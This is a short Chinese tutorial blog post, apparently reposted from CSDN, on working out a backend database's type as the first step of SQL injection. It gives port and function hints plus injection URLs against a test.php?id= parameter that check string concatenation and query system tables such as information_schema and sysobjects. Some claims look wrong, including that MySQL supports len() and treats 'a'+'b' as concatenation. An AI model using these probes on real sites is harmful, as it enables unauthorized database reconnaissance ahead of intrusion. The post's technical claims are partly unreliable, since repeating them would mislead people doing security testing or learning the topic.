SQL注入如何判断数据库类型

前言

在进行SQL注入之前,首先应该判断数据库的类型,不同的数据库在处理一些函数的时候会有一些微妙的差别,只有判断出是哪种数据库类型,这样才能根据数据库的类型选择合适的函数,更容易实现SQL注入。

前端与数据库类型

asp:SQL Server,Access
.net:SQL Server
php:MySQL,PostgreSQL
java:Oracle,MySQL

根据端口判断

Oracle:默认端口1521
SQL Server:默认端口1433
MySQL:默认端口3306

根据数据库特有函数来判断

len和length

len():SQL Server 、MySQL以及db2返回长度的函数。
length():Oracle和INFORMIX返回长度的函数。

version和@@version

version():MySQL查询版本信息的函数
@@version:MySQL和SQL Server查询版本信息的函数

substring和substr

MySQL两个函数都可以使用
Oracle只可调用substr
SQL Server只可调用substring

根据特殊符号进行判断

/*是MySQL数据库的注释符
--是Oracle和SQL Server支持的注释符
;是子句查询标识符,Oracle不支持多行查询,若返回错误,则说明可能是Oracle数据库
#是MySQL中的注释符,返回错误则说明可能不是MySQL,另外也支持--/**/

根据数据库对字符串的处理方式判断

  1. MySQL
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 
http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab' 
  1. Oracle
http://127.0.0.1/test.php?id=1 and 'a'||'b'='ab' 
http://127.0.0.1/test.php?id=1 and CONCAT('a','b')='ab' 
  1. SQL Server
http://127.0.0.1/test.php?id=1 and 'a'+'b'='ab' 

根据数据库特有的数据表来判断

  1. MySQL(version>5.0)
http://127.0.0.1/test.php?id=1 and (select count(*) from information_schema.TABLES)>0 and 1=1
  1. Oracle
 http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1
  1. SQL Server
 http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)>0 and 1=1

猜你喜欢

转载自blog.csdn.net/weixin_43749601/article/details/115369123